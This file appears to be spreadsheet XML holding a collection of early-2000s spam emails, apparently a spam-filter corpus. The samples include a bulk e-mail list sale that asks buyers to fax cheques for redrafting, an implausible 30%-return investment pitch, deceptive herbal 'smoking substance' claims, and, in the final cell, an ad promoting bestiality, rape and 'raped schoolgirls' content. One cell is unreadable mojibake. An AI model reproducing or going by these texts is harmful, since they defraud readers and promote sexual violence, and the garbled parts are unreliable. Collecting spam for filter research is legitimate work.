1-308-650-5905 ext 121 Are fax your order to 1-415-873-2700 This Number is for credit Card Orders Only!!!CHECK BY FAX SERVICES!__________________________________________To order, via credit card simply cut/paste and print out theEZ ORDER FORM below and fax to our office today.***** NOW ONLY $150! *****This "Special Price" is in effect for the next seven days,after that we go back to our regular price of $250.00 ...Don't delay... you can be in business tomorrow! We accept Visa, Mastercard, Amex, Disc and Checks by Fax.----------------------Cut &amp; Paste-------------------------------------------EZ Order Form---------------------_____Yes! I want everything! I am ordering within 72 hours.Include my FREE "Business On A Disk" bonus along with your Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)for the special price of only $150.00 + shipping as indicatedbelow._____Yes! I missed the 72 hour special, but I am orderingCD WITH, super clean e-mail addresses within 7 days for the"special" price of only $250.00 + s&amp;h._____Oop's I missed the 72 hour and 7 day "specials". I amordering The Cd at the regular price of $250.00 + s&amp;h.***PLEASE SELECT YOUR SHIPPING OPTION***____I would like to receive my package FedEx OVERNIGHT. I amincluding $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,all other International add an *additional* $25 [$40 total] for shipping)____I would like to receive my package FedEx 2 DAY delivery.I'm including $10 for shipping. (Sorry no Canada or Internationaldelivery - Continental U.S. shipping addresses only)***Please Print Carefully***NOTE: Orders cannot be shipped without complete informationincluding your signature. No exceptions!NAME____________________________________________________COMPANY NAME____________________________________________ADDRESS_________________________________________________(FedEx can only ship to street addresses - no P.O. boxes)CITY, STATE, ZIP________________________________________PHONE NUMBER____________________________________________(required for shipping &amp; tracking) EMAIL ADDRESS___________________________________________(Print Carefully - required in case we have a question and tosend you a confirmation that your order has been shipped and for technical support if you order within 24 hrs) TYPE OF CREDIT CARD:______VISA _____MASTERCARD ______AMEX ______DISCCREDIT CARD# __________________________________________EXPIRATION DATE________________________________________NAME ON CARD___________________________________________TOTAL AMOUNT (Including Shipping): $___________________DATE:x__________________(Required) SIGNATURE:x_________________________________I understand that I am purchasing the e-mail address on CD,and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charge.O R D E R N O W . . . SAME DAY SERVICE (M-F) if your orderis received before 3pm Central . To place an order, you can call us at: 1-308-650-5905 ext 121 Are fax your order to1-415-873-2700 This Number is for credit Card Orders Only!!!CHECK BY FAX SERVICES!If you would like to fax a check, paste your check below and fax it to our office along with the EZ Order Form forms to: 1-415-873-2700 *************************************************************24 HOUR FAX SERVICES*** PLEASE PASTE YOURCHECK HERE AND FAX IT TO US AT 1-415-873-2700 **********************************************************If You fax a check, there is no need for you to mail theoriginal. We will draft a new check, with the exactinformation from your original check. All checks will beheld for bank clearance. (7-10 days) Make payable to: "S.C.I.S"-=-=-=-=--=-=-=-=-=-=-=offlist Instructions=-=-=-=-=-=-=-=-=-=-=-=**************************************************************Do not reply to this message - mailto:nomomail@flashmail.com?Subject=offnowc
**************************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">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Looking4Money P.S. Someone recently sent the letter to me and it has been the most
eye-opening, financially beneficial information I have ever received. I
honestly believe that you will feel the same way once you've read it. And
it's FREE! 
</t>
  </si>
  <si>
    <t xml:space="preserve">WANT TO MAKE MONEY?
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
HOT BUSINESS OPPERTUNITY AVAILABLE
fOR THOSE WHO QUALIFY...
1.  MUST BE A UNITED STATES RESIDENT
2.  MUST BE 21 YEARS OF AGE OR OVER.
YOU WILL SHARE IN DIALYSIS CENTERS OF AMERICA
LATEST CASH INCOME STREAM.
EARN OVER 30% RETURN ON YOUR MONEY!
INTEREST PAID ANNUALLY!
COMPLETELY LEGAL.
TO FIND OUT ALL THE HOW'S AND WHY'S,
REPLY TODAY WITH YOUR NAME, STATE AND COMPLETE PHONE 
NUMBER.  DETAILS WILL SOON FOLLOW!-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
############################################
#                                          #
#       Adult Online Super Store           #
#              Shhhhhh...                  #
#     You just found the Internet's        #
#          BEST KEPT SECRET!!!             #
#    3 Vivid DVDs Absolutely FREE!!!       #
#                                          #
############################################If you haven't seen it yet... we are offering a
new weekly selection absolutely FREE Adult DVDs
AND VIDEOS NO PURCHASE NECESSARY!!!!! GO TO: http://209.203.162.20/8230/Everything must go!!! Additional Titles as
low as $6.97&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;NO PURCHASE NECESSARY! &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;############################################
#                                          #
#  Don't forget to forward this email to   #
#  all your friends for the same deal...   #
#  There is a new free DVD and VHS video   #
#  available every week for your viewing   #
#  pleasure.                               #
#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removal.This e-mail is sent in compliance with the Information Exchange Promotion 
and Privacy Protection Act. section 50 marked as 'Advertisement' with valid 
'removal' instruction.kpjxxyrsjsnapbhilmbgsnenma
</t>
  </si>
  <si>
    <t xml:space="preserve">Email marketing - if done right - is both highly effective and amazingly cost effective.  OK, it can be 
downright PROFITABLE.  If done right.Imagine sending your sales letter to one million, two million, ten million or more prospects during 
the night.  Then waking up to sales orders, ringing phones, and an inbox full of freshly qualified 
leads.We've been in the email business for over seven years now.Our lists are large, current, and deliverable.  We have more servers and bandwidth than we currently 
need.  That's why we're sending you this note.  We'd like to help you make your email marketing 
program more robust and profitable.Please give us permission to call you with a proposal custom tailored to your business.  Just fill out 
this form to get started:Name _______________________Email Address ________________Phone Number ________________URL or Web Address ___________I think you'll be delighted with the bottom line results we'll deliver to your company.Click Here: mailto:batch1@btamail.net.cn?subject=Inquiry-Including-Contact-InfoThank You!Remove requests Click Here: mailto:batch1@btamail.net.cn?subject=remove-b2b-listlicatdcknjhyynfrwgwyyeuwbnrqcbh
</t>
  </si>
  <si>
    <t xml:space="preserve">Email marketing - if done right - is both highly effective and amazingly cost effective.  OK, it can be 
downright PROFITABLE.  If done right.Imagine sending your sales letter to one million, two million, ten million or more prospects during 
the night.  Then waking up to sales orders, ringing phones, and an inbox full of freshly qualified 
leads.We've been in the email business for over seven years now.Our lists are large, current, and deliverable.  We have more servers and bandwidth than we currently 
need.  That's why we're sending you this note.  We'd like to help you make your email marketing 
program more robust and profitable.Please give us permission to call you with a proposal custom tailored to your business.  Just fill out 
this form to get started:Name _______________________Email Address ________________Phone Number ________________URL or Web Address ___________I think you'll be delighted with the bottom line results we'll deliver to your company.Click Here: mailto:batch1@btamail.net.cn?subject=Inquiry-Including-Contact-InfoThank You!Remove requests Click Here: mailto:batch1@btamail.net.cn?subject=remove-b2b-listvkmoitjkwtwgpxprfmsmqeywcuar
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hunza BreadHunza Bread
Home made Hunza Bread is a simple, delicious and nutritious bread that is easily 
prepared in just 5 minutes  using a few ingredients that have 
always been universally available. The taste of this bread is wonderful.
HUNZA BREAD Miraculously Stops Your Appetite And Hunger and is based on a 2000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 </t>
  </si>
  <si>
    <t xml:space="preserve">go..  jm@netnoteinc.com
Ink Price________________________________________________________________________________________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
</t>
  </si>
  <si>
    <t xml:space="preserve">ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½vï¿½Aï¿½wï¿½ï¿½ï¿½rï¿½Yï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
Â 
ï¿½ï¿½ï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½gï¿½Hï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½qï¿½Lï¿½Aï¿½ï¿½ï¿½Lï¿½ï¿½ï¿½@ï¿½ï¿½ï¿½C
ï¿½aï¿½ï¿½ 1992ï¿½~ï¿½_ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½iï¿½ï¿½ï¿½Pï¿½ï¿½ï¿½ï¿½ 1993ï¿½~ï¿½wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½`ï¿½ï¿½ï¿½Pï¿½ï¿½  
  ï¿½C
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½rï¿½ï¿½0502983ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Dï¿½aï¿½Uï¿½tï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Dï¿½kï¿½ï¿½ï¿½~ï¿½C
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½Gï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Gï¿½gï¿½ï¿½ï¿½Yï¿½iï¿½Pï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½C
ï¿½Aï¿½ï¿½ï¿½sï¿½vï¿½ï¿½ï¿½Gï¿½ï¿½ï¿½tï¿½Aï¿½Gï¿½ï¿½ï¿½Tï¿½ï¿½ï¿½ï¿½ï¿½Yï¿½iï¿½ï¿½ï¿½sï¿½vï¿½C
Â 
Â 
ï¿½gï¿½`ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Hï¿½ï¿½ï¿½Yï¿½vï¿½ï¿½ï¿½ï¿½ï¿½Vï¿½ï¿½ï¿½Vï¿½Yï¿½ï¿½ï¿½A ï¿½iï¿½ï¿½ï¿½bï¿½ï¿½ï¿½[ï¿½ï¿½ï¿½Nï¿½ï¿½ï¿½Yï¿½Nï¿½[ï¿½Jï¿½rï¿½Yï¿½@ï¿½ï¿½ï¿½Cï¿½ï¿½ï¿½ï¿½ï¿½zï¿½Oï¿½_ï¿½]ï¿½ï¿½ï¿½{ï¿½Pï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Dï¿½Hï¿½ï¿½ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½pï¿½jï¿½hï¿½oï¿½ï¿½ï¿½bï¿½ï¿½ï¿½~ï¿½kï¿½ï¿½ï¿½ï¿½ï¿½Wï¿½A  
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½kï¿½ï¿½ï¿½|ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½Dï¿½Cï¿½Dï¿½nï¿½ï¿½ï¿½]ï¿½Oï¿½kï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½yï¿½ï¿½ï¿½ï¿½ï¿½C
Â 
ï¿½ï¿½ï¿½ï¿½ï¿½Eï¿½ï¿½ï¿½|ï¿½ï¿½ï¿½Eï¿½Yï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½oï¿½ï¿½ï¿½A ï¿½Yï¿½Lï¿½kï¿½ï¿½ï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½A ï¿½hï¿½|ï¿½ï¿½ï¿½nï¿½bï¿½ï¿½ï¿½Uï¿½ï¿½ï¿½ï¿½ï¿½hï¿½ï¿½ï¿½A ï¿½yï¿½ï¿½ï¿½ï¿½ï¿½nï¿½ï¿½ï¿½iï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½A ï¿½iï¿½ï¿½ï¿½ï¿½ï¿½Yï¿½vï¿½eï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½C
Â 
ï¿½kï¿½ï¿½ï¿½sï¿½ï¿½ï¿½A ï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Dï¿½A ï¿½ï¿½ï¿½ï¿½ï¿½nï¿½ï¿½ï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½hï¿½lï¿½ï¿½ï¿½oï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½A ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½kï¿½Nï¿½Oï¿½G(1). ï¿½gï¿½`ï¿½~ï¿½Y(2). ï¿½ï¿½ï¿½ï¿½ï¿½Xï¿½Aï¿½ï¿½ï¿½~ï¿½vï¿½ï¿½  
(3). ï¿½ï¿½ï¿½ï¿½ï¿½Vï¿½Bï¿½Sï¿½v (4). ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Yï¿½ï¿½( ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Yï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½Yï¿½Yï¿½i ) (5). ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Yï¿½vï¿½ï¿½ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½ï¿½(6).  
ï¿½ï¿½ï¿½ï¿½ï¿½uï¿½}ï¿½iï¿½vï¿½Gï¿½B ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½C
ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½~ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½G 
Â 
ï¿½yï¿½_ï¿½ï¿½ï¿½nï¿½iï¿½vï¿½Gï¿½zï¿½ï¿½ï¿½}ï¿½ï¿½ï¿½ï¿½ï¿½tï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Hï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½Qï¿½Aï¿½ï¿½ï¿½kï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½K.ï¿½ï¿½ï¿½Qï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Qï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½tï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½gï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½rï¿½ï¿½0502983ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½gï¿½Lï¿½ï¿½ï¿½ï¿½FDAï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½yï¿½ï¿½ï¿½{ï¿½ï¿½RIPTï¿½Hï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Lï¿½ï¿½ï¿½Eï¿½wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Pï¿½iï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Lï¿½`ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Lï¿½qï¿½ï¿½ï¿½ï¿½ï¿½Gï¿½ï¿½Seï¿½Bï¿½ï¿½Mnï¿½tï¿½qï¿½ï¿½ï¿½ï¿½ï¿½Iï¿½C
Â 
ï¿½ï¿½ï¿½ï¿½ï¿½rï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½cï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Eï¿½ï¿½ï¿½Aï¿½bï¿½Yï¿½ï¿½ï¿½ï¿½ï¿½Eï¿½oï¿½ï¿½ï¿½ï¿½ï¿½Wï¿½ï¿½ï¿½Aï¿½Oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½Dï¿½]ï¿½Cï¿½yï¿½_ï¿½ï¿½ï¿½nï¿½iï¿½vï¿½Gï¿½zï¿½ï¿½ï¿½tï¿½ï¿½ï¿½Iï¿½ï¿½ï¿½Lï¿½qï¿½ï¿½ï¿½ï¿½ -  
ï¿½ï¿½Mnï¿½Aï¿½ï¿½ï¿½Pï¿½iï¿½ï¿½ï¿½Gï¿½ï¿½ï¿½yï¿½Jï¿½ï¿½ï¿½ï¿½ï¿½tï¿½Mï¿½ï¿½ï¿½Wï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½Mï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Yï¿½Yï¿½Vï¿½aï¿½Aï¿½ï¿½ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½C
Â 
ï¿½ï¿½ï¿½ï¿½ï¿½yï¿½_ï¿½ï¿½ï¿½nï¿½iï¿½vï¿½Gï¿½zï¿½ï¿½ï¿½nï¿½ï¿½ï¿½Oï¿½bï¿½Yï¿½vï¿½~ï¿½bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½Yï¿½Qï¿½ï¿½ï¿½rï¿½Bï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Uï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Pï¿½iï¿½lï¿½ï¿½ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½oï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½Gï¿½C
Â 
Â 
Â 
ï¿½ï¿½ï¿½fï¿½ï¿½ï¿½ï¿½ï¿½Aï¿½Rï¿½Gï¿½eï¿½@ï¿½jï¿½ï¿½ï¿½eï¿½Aï¿½Zï¿½ï¿½ï¿½R
Â ï¿½@ï¿½~ï¿½]NT1,600ï¿½ï¿½)ï¿½Gï¿½Yï¿½ï¿½ï¿½eï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½vï¿½ï¿½ï¿½U
ï¿½ï¿½ï¿½eï¿½]ï¿½tï¿½Gï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½gï¿½ï¿½ï¿½C 
ï¿½ï¿½ï¿½Uï¿½ï¿½ï¿½vï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½C 
ï¿½ï¿½ï¿½ï¿½ï¿½rï¿½gï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½sï¿½C 
ï¿½Oï¿½vï¿½`ï¿½ï¿½ï¿½C 
ï¿½uï¿½}ï¿½ï¿½ï¿½vï¿½ï¿½ï¿½~ï¿½ï¿½ï¿½ï¿½ï¿½Cï¿½Tï¿½~ï¿½]NT3,200ï¿½ï¿½ )  
  ï¿½Gï¿½ï¿½ï¿½ï¿½ï¿½eï¿½ï¿½ï¿½ï¿½ï¿½@ï¿½vï¿½ï¿½ï¿½Uï¿½~ï¿½Aï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½eï¿½qï¿½ï¿½ï¿½Aï¿½[ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½~ï¿½vï¿½ï¿½ï¿½@ï¿½~ï¿½C
Â 
ï¿½wï¿½ï¿½ï¿½ï¿½ï¿½gï¿½Hï¿½Uï¿½qï¿½ï¿½ï¿½ï¿½ï¿½qï¿½ï¿½ï¿½G
Â 
ï¿½qï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
ï¿½mï¿½W
 ï¿½Xï¿½ï¿½ï¿½~
 ï¿½aï¿½}
 ï¿½lï¿½ï¿½ï¿½ï¿½ï¿½ï¿½
 ï¿½ï¿½ï¿½ï¿½ï¿½eï¿½F
      ï¿½ï¿½ï¿½W0900~1200  ï¿½Uï¿½ï¿½1200~1700  
       ï¿½ï¿½ï¿½ï¿½1700~2100 ï¿½pï¿½ï¿½ï¿½qï¿½ï¿½
 ï¿½ï¿½ï¿½ï¿½
 E-mail
 ï¿½ï¿½ï¿½nï¿½R Â   3ï¿½~--3200ï¿½ï¿½  
       1ï¿½~--1600ï¿½ï¿½  
Â 
ï¿½zï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½_ï¿½Qï¿½Nï¿½ï¿½
(ï¿½ï¿½ï¿½iï¿½ï¿½ï¿½{ï¿½bï¿½ï¿½ï¿½xï¿½Zï¿½zï¿½ï¿½ï¿½Yï¿½vï¿½ï¿½ï¿½D)  http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">****************************
Now Open Seven Days A Week!    
Call 1-623-974-2295
****************************&gt;&gt;From the ethnobotanical herbalists who brought the herba supplementals; Kathmandu Temple Kiff â€œ1â€ &amp; â€œ2â€ â€œPersonal-Choiceâ€, pipe-smoking products/substances to the common market!!!  We are finally able to offer for your â€œSensitive/Responsiveâ€, â€œPersonal Choiceâ€ Smoking Enjoymentâ€¦.the â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) Pipe-Smoking Substance Supplemental Productâ€¦. Introduced after three years of research and development; Temple â€œ3â€ is â€œPersonal Choiceâ€ legal Smoking/Indulgenceâ€¦.Redefined!!!  Thanks to recent, dramatic, technological advances in the laboratorial processes for the extraction of alkaloid and glycocide supplements from botanicals/herbas/plant matter, we are now able to offerâ€¦.in more cultivated/enhanced/viripotent/substantiated formatâ€¦.what had actually already been the most significant, lawful, â€œPersonal Choiceâ€ smoking substance available on the planetâ€¦.  â€œSeventh Heavenâ€ Temple â€œ3â€ Ragga Dagga (TM) is the sweet, sweet evolution of all of thatâ€¦. * A 20 X MORE VIRIPOTENT HERBA SUPPLEMENT THAN ITS PREDESSORS (TEMPLE â€œ1â€ &amp; â€œ2â€).* HAPPIER, HAPPY SMOKING!!!* INDEED, A DEPRESSIVE REGRESSIVE, SUPPLEMENTAL MOOD-ENHANCER.* MORE SOPHISTICATED, UPLIFTING &amp; POISED THAN ILLEGAL SMOKING  SUBSTANCES.* NO REGULATION, NO ILLEGALITY, NO FAILED DRUG TESTS!!!* INHIBITS STRESS AND ANXIETYâ€¦.* INSPIRES CONTEMPLATIVENESS &amp; CREATIVITYâ€¦.* ENHANCES THE SEXUAL EXPERIENCE!!!* GENERATES MORE RESTFUL SLEEP &amp; LUCID DREAMINGâ€¦.*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WAYâ€¦.JUST 4 OR 5 DRAWS OF YOUR PIPE (A traditional hand herb-pipe is included with each package of Ragga Dagga).Temple â€œ3â€ Ragga Dagga (TM) is an exclusive, botanical/herba, proprietary; Nepalesian formulated, ultra-â€œSensitive/Responsiveâ€,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 A one-of-a-kind, proprietary amalgamation, comprised of extreme high-ratio concentrated extracts which are derived from various common and uncommon â€œsensitive/responsiveâ€ herbas primarily cultivated within and imported from the southern and eastern hemispheres; Temple â€œ3â€ Ragga Dagga (TM) high-ratio factored botanical extractions are master-crafted into solid jiggets/bars which are structurally reminiscent of what one might find in the â€œhappinessâ€ coffee and tea houses of Nepal/Kathmandu/Amsterdam and in many aspects, possesses a more collected and more focused, less scattered ambiance.  Ingredients:Temple smoking substances and Temple â€œ3â€ Ragga Dagga (TM) have always been and will always remain exclusive EXOTIC BOTANICAL RESOURCES â€œHouse Smoking Substance Specialtiesâ€.  Temple â€œ3â€ Ragga Dagga (TM) is both a euphonious/celebratory and relaxing/calming pipe-smoking substance that offers both physical and cerebral significators.  Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) is an absolutely legal, herba/botanical, â€œPersonal Choiceâ€, pipe-smoking substantiality product!!!  No included botanical factor therein is regulated by law or considered to be harmful by regulatory agencies.  There is no tobacco in Temple â€œ3â€ Ragga Dagga (TM).  There is certainly no cannabis/marijuana in Temple â€œ3â€ Ragga Dagga (TM)â€¦.  And although we are not age-governed by lawâ€¦.Temple â€œ3â€ Ragga Dagga (TM) is intended exclusively for sophisticated adult usage! Subsequently, it is our MANDATORY ethical policy that Temple â€œ3â€ Ragga Dagga (TM) may not be sold, offered, or given to any person that has not attained at least twenty-one years of age.  All things in their timeâ€¦.  As well, Temple â€œ3â€ Ragga Dagga (TM) is not intended for use during work or while driving.  It should not be enjoyed during pregnancy nor is it intended to supercede physicianâ€™s care in any regard.========================================================
Here is what our customers are saying about the Temple â€œ3â€ Ragga Dagga (TM) phenomenon:â€œTo whom it may concern,I was skeptical when I first read your ad.  I grew up in the 70â€™s &amp; 80â€™s.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think?Sincerely,RJâ€Location: Midwest, U.S.A.â€œThank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you.â€-- Frankie R.Location: West Coast, USAâ€œIâ€™m a man of my 40â€™s and I really know my stuff.  I donâ€™t drink or do illegal drugs anymore and have found a much more spiritual path.  I used to have to take Valium in the past.  Not anymore with the Temple â€œ3â€.  It really amazes me how this stuff tastes like the Lebanese and blonde stuff I used to smoke in the 70â€™s.  I am very satisfied with all of your products.  I like them a lot and will be a customer for life for sure.  Whoever makes this stuff is an ARTIST at it.  Who would have thought?!â€  -- A.J.Location: United Kingdom
========================================================
Finally, we realize of course that this Temple â€œ3â€ Ragga Dagga (TM) is not inexpensiveâ€¦. (Temple â€œ3â€ Ragga Dagga (TM) is a very, very Sweet Smoke and â€œsweetnessâ€ is never acquired inexpensively.  Such is the way of the Economic Tao....), nor, as a matter of fact, is it inexpensive for us to acquire, factor or master-craftâ€¦.  Quite simply, it is the very best of its Kind that there is to be acquired.  Just a snippet/pinch of this Temple â€œ3â€ Ragga Dagga (TM)â€¦. Four or five draws of your pipeâ€¦.as is the magical wayâ€¦.lingers for a good, goodly while!!!  (An herb pipe and usage instructions are included with each Temple â€œ3â€ Ragga Dagga (TM) Package.)â€œSeventh Heavenâ€ Temple â€œ3â€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â€œ3â€ Ragga Dagga (TM) along with our other â€œvery fineâ€ â€œSensitive/Responsiveâ€ cordial botanical productsâ€¦. Please enjoy!!!  Many Blessings to you allâ€¦.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**************************************************ORDERING INFORMATION:
For your convenience, you can call us direct with your orders or questions.Don't forget to ask for the 2 for 1 Weekend Special!!
 Special good July 6&amp;7, 2002 ONLY
Call 1-623-974-2295   
7 Days a Week -- 10:30 AM to 7:00 PM (Mountain Time)
For all domestic orders, add $6.00 shipping &amp; handling (shipped U.S. Priority Mail).  Add $20.00 for International orders.**************************************************SPECIAL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To remove your address from our list, click "Reply" in your email software and type "Remove" in the subject field, then send. 
</t>
  </si>
  <si>
    <t xml:space="preserve">What have you been up to?
I don't know about you, but I am sick and tired of going
down to the store to find out that your printer cartridges
cost more than the printer itself! I know how you feel
- I print over 500 pages a day, and it feels like there is
a vacuum sucking money out of my wallet! Now, this has got
to stop because I know it doesn't cost the printer companies
anywhere near what it costs me to do my office and school work!
Well, it finally has.  The SUPERINK solution.You're probably thinking to yourself, "Gosh darn, not another
cheap knockoff printer cartridge!"Â  Like you, I was very 
skeptical at first, but my best friend &amp; business associate
said it helped her save over $100 a month on printer supplies. 
So I tried it.Â  I mean, there was nothing to lose because they
offer a 100% satisfaction guarantee, up to a one-year warranty
on all of their products and FREE Shipping on ALL orders!
Let me tell you, it was one of the best decisions I've ever made.
Period.Â  Six months later, as I'm writing this message to you,
I've gone from spending $1000 dollars a month on printer supplies
to Now ONLY $475! and I haven't had to sacrifice the quality or
service that I received from the local office supply store. In fact,
the service is even BETTER!  I've had 1 defective cartridge since 
I started dealing with SUPERINK and they sent me a new replacement
within 3 days, no questions asked. Now, I can print all I want!I was so happy with the results that I contacted their manufacturer
and got permission to be a reseller - at a BIG discount.Â  I want
to help other people to avoid getting jipped by the printer companies
like I did. Because a penny saved is a penny earned! 
I give you my personal pledge the SUPERINK soltuion will absolutely
WORK FOR YOU. If it doesn't, you can return your order anytime
for a full refund.Â  Â  If you are frustrated with dishing out money like it is water to the
printer companies, or tired of poor quality ink &amp; toner cartridges,
then I recommend - the SUPERINK solution.You're probably asking yourself, "Ok, so how do we save all this money
without losing quality and service?"Modern technology has provided SUPERINK with unique, revolutionary
methods of wax molding that allow the ink &amp; toner to 'settle', which
prevents any substantial damage that would occur during shipping and
handling. Nothing "magic" about it - just quality &amp; savings, BIG SAVINGS!Here is the bottom line ...I can help you save 30%-70% per week/per month/per year or per lifetime 
by purchasing any of our ink &amp; toner supplies. Just try it once, you'll 
keep coming back - there's nothing to lose, and much MONEY to be saved! 
100% Satisfaction Guaranteed. You will be able to print as much as you
want without wasting money or sacrificing quality - GUARANTEED.
That is my pledge to you.Â  To order from the SUPERINK Solution on our secure server, just click
on the link below (or enter it into your browser):http://www.superink.net/If you have difficulty accessing the website above, please
try contacting us toll-free at 1-800-758-8084 - Thanks!Sincerely - Bruce Tipton
******************************************************************
If you do not wish to receive any more emails from me, please 
send an email to "print2@btamail.net.cn" requesting to be removed.
Thank You and Sorry for any inconvenience.
******************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!--
a {  text-decoration: none }
--&gt;
Hello 
        valued member! We are happy to present to you our great offer!
        Brand bew collection of top rated sites!
        Each include 3 sites at cost of 1!
Exclusive content and regulary updates is garanteed!
Animals
        Sex with dogs, horses, pigs and more other.....Brutal 
        Rape
        World of violence and cruelty. Raped schoolgirls, housewifes and other 
        sweet beaches.Incest
        Home of parental sex. No censorship. No limits.Anime
        All famous artist is worked for you. Only qualuty comics, pics and full 
        length movies. 
Just 
